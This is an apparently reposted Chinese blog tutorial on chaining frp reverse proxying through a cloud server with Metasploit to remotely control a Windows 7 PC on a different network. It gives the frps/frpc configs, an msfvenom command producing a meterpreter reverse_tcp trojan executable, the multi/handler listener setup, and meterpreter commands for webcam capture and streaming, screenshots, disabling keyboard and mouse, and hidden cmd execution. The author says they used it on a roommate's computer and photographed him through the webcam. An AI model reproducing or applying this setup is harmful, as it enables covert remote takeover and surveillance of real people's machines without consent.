frp反向代理+內網穿透+ Metasploit滲透windows


實驗環境:
阿里雲ECS一台:x.x.x.x

    內網kali控制端:192.168.2.104

    外網win7主機:

前言
我在家,我室友在學校,在兩個完全不同的局域網,我想穿過公網實現遠控他的電腦,我上篇文章寫過局域網下kali控制win7,想想,黑客都和肉雞在一個局域網了,要是遇見高手了還怕抓不住你?,自己琢磨了很久,想到我前面剛好做過frp內網穿透,由於frp是一個高效反向代理和內網穿透的軟件,剛好配合kali的metsploit 做真正的遠控,想想就覺得牛逼,哈哈,只是自己的猜想,網上找資料沒找到,所以自己動手了。

場景描述

操作步驟:
由於上篇文章寫過搭建frp,所以這里不詳細寫,很簡單的,直接給配置文件,不會frp請看:https://blog.csdn.net/qq_38228830/article/details/85722385

1、阿里雲主機上啟動frps
配置文件如下:

     vim frps.ini

frp服務端與客戶端連接端口,frps和frpc必須一致

bind_port = 7000

下面配置可以不寫,個人意願

儀表盤端口,只有設置了才能使用儀表盤(即后台)

dashboard_port = 7500

儀表盤訪問的用戶名密碼,如果不設置,則默認都是 admin

dashboard_user = admin
dashboard_pwd = admin
啟動frps:./frps. -c ./frps.ini

2、 kali啟動frpc:
配置文件如下:

          vim frpc.ini 

[common]
server_addr = 你的雲主機ip
server_port = 7000 #frpc工作端口,必須和上面frps保持一致

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #轉發給本機的5555
remote_port = 6000 #服務端用6000端口轉發給本機
啟動frpc: ./frpc -c ./frpc.ini

      這時服務端有顯示了:

  到此frp反向代理+內網穿透做完,下面開始木馬程序制作與監聽控制。

3、msfvenom制作Windows木馬程序:關鍵步驟
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公網ip lport=6000 -f exe x>Xaly.exe

     lhost:必需設置為你的公網ip

     lport:設置你在frpc.ini的remote_port = 6000

     只有通過服務器的6000端口數據包才能成功轉發到我們的kali上來,這也是為什么要用frp反向代理原因。

制作好后將xaly.exe發送到目標Windows上

4、開始監聽:關鍵步驟
在kali中

msfconsole

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 127.0.0.1 #設置監聽ip,必須和frpc中的local_ip 一致

lhost => 127.0.0.1

msf exploit(multi/handler) > set lport 5555 #設置監聽端口,與frpc中的local_port一致

lport =>5555

msf exploit(multi/handler) > exploit

開始測試

Windows端運行木馬,
先觀察我們阿里雲的frp服務端情況

再觀察kali監控情況:

表示獲得了win7的控制權了,下面測試命令

  webcan_snap  利用攝像頭拍照

  我室友照片

截取他的win7桌面

  screenshot

其他命令:

uictl開關鍵盤/鼠標
uictl [enable/disable] [keyboard/mouse/all]  #開啟或禁止鍵盤/鼠標
uictl disable mouse  #禁用鼠標
uictl disable keyboard  #禁用鍵盤



webcam攝像頭命令
webcam_list  #查看攝像頭
webcam_snap   #通過攝像頭拍照
webcam_stream   #通過攝像頭開啟視頻


execute執行文件
execute #在目標機中執行文件
execute -H -i -f cmd.exe # 創建新進程cmd.exe,-H不可見,-i交互


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM